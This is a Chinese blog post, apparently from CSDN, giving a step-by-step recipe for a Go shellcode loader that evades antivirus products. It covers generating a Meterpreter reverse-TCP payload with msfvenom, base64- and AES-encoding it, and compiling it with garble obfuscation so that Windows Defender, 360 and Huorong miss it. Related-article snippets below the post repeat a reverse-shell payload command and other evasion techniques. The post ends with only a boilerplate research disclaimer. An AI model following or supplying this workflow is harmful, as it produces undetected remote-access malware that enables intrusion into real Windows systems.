免杀方法(十)GO免杀shellcode加载器 — go-shellcode-loader​

最新推荐文章于 2024-06-05 23:35:38 发布
最新推荐文章于 2024-06-05 23:35:38 发布
阅读量2k 收藏 12
点赞数 1
分类专栏: 安全 免杀技巧 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56426046/article/details/127166338
版权

项目作者:HZzz

项目地址:https://github.com/HZzz2/go-shellcode-loader

一、工具介绍

GO混淆免杀shellcode加载器AES加密,混淆反检测 过DF、360和火绒。

二、安装与使用

1、获取项目

git clone https://github.com/HZzz2/go-shellcode-loader.git
cd go-shellcode-loader
//下条命令安装第三方混淆库  
GitHub地址:https://github.com/burrowers/garble
go install mvdan.cc/garble@latest

2、生成shellcode并base64

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=9999 -f raw > rev.raw

base64 -w 0 -i rev.raw > rev.bs64

cat rev.bs64

 

3、复制到aes-sc.go中的44行替换payload

运行aes-sc.go生成AES加密后的值

go run aes-sc.go

复制输出的值到go-sc.go中的52行替换payload

 4、编译成exe可执行程序

garble -tiny -literals -seed=random build -ldflags="-w -s -H windowsgui" -race go-sc.go

5、参数解释:

garble(混淆库):-tiny                    删除额外信息                    -literals               混淆文字-seed=random   base64编码的随机种子 go:-w                        去掉调试信息,不能gdb调试了-s                         去掉符号表-H windowsgui    隐藏执行窗口,不占用 cmd 终端。(被查杀率高)-race                    使数据允许竞争检测,编译时改变了生成后的文件特征, 使得杀软无法检测,当然有一天也会失效的。编译后得到go-sc.exe

  免杀效果不错。

仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者不承担任何法律及连带责任。

成熟的人眼里满是前途,稚嫩的人眼里满是爱恨情仇

夜yesec
关注
  • 1
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
go混淆实现bypassAV(cobaltstrike免杀
qq_32445755的博客
02-09 916
近两年随着hw和红蓝对抗的增多,接触到的提权、内网渗透、域渗透也越来越多。攻击能力有没有提升不知道,但防护水平明显感觉提升了一大截,先不说防护人员的技术水平如果,最起码各种云WAF、防火墙、隔离设备部署的多了,服务上也经常能见到安装了杀软、软waf、agent等等,特别是某数字杀软在国内服务上尤为普及。这个时候,不会点免杀技术就非常吃亏了。
go-shellcode:将Shellcode加载到新进程中
02-06
壳码 这是一个将shellcode作为自己的进程运行的程序,所有程序均来自内存。 这样做是为了击败反病毒检测。 用法 请记住,只有64位shellcode将在64位进程中运行。 这无法自动检测您的Shellcode架构。 使用msfvenom或metasploit以六进制格式生成一些shellcode: $ msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=127.0.0.1 LPORT=4444 c:\windows\temp>sc.exe fce8820000006089e531c0648b5030
基于Go加载shellcode
Le1a's Blog
10-21 2053
这里通过TideSec的go免杀项目来从0开始学习首先导个包,需要用到如下几个包。io/ioutil 文件操作os 系统操作syscall syscall包含一个指向底层操作系统原语的接口unsafe Go指针的操作非常有限,仅支持赋值和取值,不支持指针运算,可以通过unsafe包来达到效果这里定义一下变量,然后需要通过syscall来加载两个dll,和ntdll.dll。然后这里有一个检查报错的函数,如果有报错就退出并打印报错信息。
免杀】C2远控-初识shellcodeLoader
最新发布
qq_55349490的博客
06-05 961
ShellCode的本质其实就是一段可以自主运行的代码它没有任何文件结构,它不依赖任何编译环境,无法像exe一样双击运行,因此需要通过控制程序流程跳转到shellcode地址加载上去执行shellcode。目的:杀毒和感知平台如何定性分析:OD&xdb&ida提取:010Editor加载:各种Loader方法执行顾名思义,Loader就是加载的意思,写好的shellcode是需要用加载Loader)来运行的。且同一个shellcode可以用不同的Loader来运行。
记一次Go语言的学习--shellcode加载免杀
jjjjj34的博客
04-24 1497
在网上搜了很多关于Go语言的免杀,我也是刚学几天,就做个学习对于GO语言做免杀的记录。
shellcode加载
goat_2003的博客
09-10 1572
编写shellcode不能使用绝对地址,因为当我们加载到其他函数中时绝对地址储存的可能什么也没有,甚至是其他函数,所以当我们需要调用一个函数时,需要动态获取函数的地址实现调用。 想要动态获取函数地址,可以使用以下函数 GetProcAddress 从dll中获取函数的地址 LoadLibraryA 将指定的模块加载到调用进程的地址空间中 举个例子: LPVOID lp = GetProcAddress(LoadLibraryA("user32.dll"),"MessageBoxA"); _asm {
Rust免杀 Shellcode加载与混淆
S18374的博客
10-19 71
下面是实现AES-CFB加解密的代码,在加密的函数中最终返回的是Hex编码后的字符串,而解密函数最终返回的是Vec数组,同样是为了方便在shellcode loader中读取加密后的shellcode以及加载解密后的shellcode。下面是实现RC4加解密的代码,在加密的函数中最终返回的是Base64编码后的字符串,而解密函数最终返回的是Vec数组,这是为了方便在shellcode loader中读取加密后的shellcode以及加载解密后的shellcode
Golang-Gin 框架写的免杀平台,内置分离、捆绑等多种BypassAV方式
Spontaneous_0的博客
02-27 523
Golang-Gin 框架写的免杀平台,内置分离、捆绑等多种BypassAV方式
Golang的Cobalt Strike Shellcode Loader-Golang开发
05-26
Cobalt Strike Shellcode Loader by Golang Doge-Loader Cobalt Strike Shellcode Loader by Golang 本人github的项目可能目前主要分为两大类, :frog: Frog系列为自动化扫描方向, :dog_face: Doge系列为免杀...
30.远控免杀专题(30)-Python加载shellcode免杀-8种方式(VT免杀率10-69)1
08-03
远控免杀专题(30)-Python加载shellcode免杀-8种方式(VT免杀率10-69)1】 在网络安全领域,绕过反病毒软件(AV)的检测,即“免杀”技术,是一项重要的技能。本文将探讨如何利用Python来加载和执行shellcode,同时尽...
32.远控免杀专题(32)-Go加载shellcode免杀-3种方式(VT免杀率7-70)1
08-03
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!文章打包下载及相关软件下载: ht
CodeLoader4Setup, v4.20.2, 2015-12-20 ini, snac014.exe
01-31
TI的codeload4配置软件,实现Ti的lmx系列,lmk系列PLL时钟芯片的寄存配置软件。I的 CODELOADER 软件下载功能可以帮助用户开始并且加速产品设计,缩短产品上市时间。TI为您提供软件说明和特性,并附上支持文档和其他资源。
garble:混淆Go构建
03-29
断章取义 GO111MODULE=on go get mvdan.cc/garble 通过包装Go工具链来混淆Go代码。 需要Go 1.16或更高版本。 garble build [build flags] [packages] 有关最新用法信息,请参见garble -h 。 目的 生成一个与常规版本一样工作的二进制文件,但其中包含的有关原始源代码的信息越少越好。 该工具旨在: 与cmd/go结合使用,以支持模块和构建缓存 给定相同的初始源代码,确定性和可重现性 在给定原始来源的情况下可逆,以消除混淆的恐慌痕迹 机制 该工具将对Go编译和链接的调用包装起来,以转换Go构建,以便: 用短的base64散列替换尽可能多的有用标识符 用较短的base64散列替换程序包路径 删除所有和信息 删除文件名和随机播放位置信息 剥离调试信息和符号表 如果给定了-literals标志,则对文字进
绕过AV:免杀shellcode加载
03-04
旁路AV 条件触发式远控VT 6/70免杀国内杀软及后卫,卡巴斯基等主流杀软 原理 使用 将shellcode填至go_shellcode_encode.py生成重复后的base64有效负载然后将生成的payload填至main.go build(“ b64shellcode”)将main.go中的网址替换为您vbs的某个网页或文本(称为网页同样可以,但是需要程序可以正常使用时此网页需要可以访问)编译:go build -ldflags =“-w -s -H = windowsgui”
Python 应该怎么学?_python应该
m0_58269070的博客
04-26 422
fn() #执行传入的fn参数@timinglst=[]@timing[i for i in range(0,100000)] #列表生成式。
免杀方法(四)Python免杀shellcode加载
qq_56426046的博客
10-03 1207
免杀方式 msfvenom生成raw格式的shellcode–>base64–>XOR–>AES将python代码缩小并混淆最后生成exe目前过DF、360和火绒 virustotal:7/66过卡巴斯基、迈克菲等。
2024年Go最新插件分享 简单免杀绕过和利用上线的 GoCS_如何做到插件反被杀,2024年网易Golang岗面试必问
2401_84924979的博客
05-14 440
/layui的监听事件和原生select不一样。//select监听事件开始。//select监听事件结束。//构造Gexp类结束。
探索Python Shellcode Loader:一个创新的代码执行工具
gitblog_00032的博客
04-03 432
探索Python Shellcode Loader:一个创新的代码执行工具 项目地址:https://gitcode.com/HZzz2/python-shellcode-loader 项目简介 Python Shellcode Loader 是一个精心设计的开源项目,旨在为安全研究人员和开发人员提供一种便捷的方式,将Shellcode(操作系统级别的机码)注入到Python程序中运行。通过此项...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜yesec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值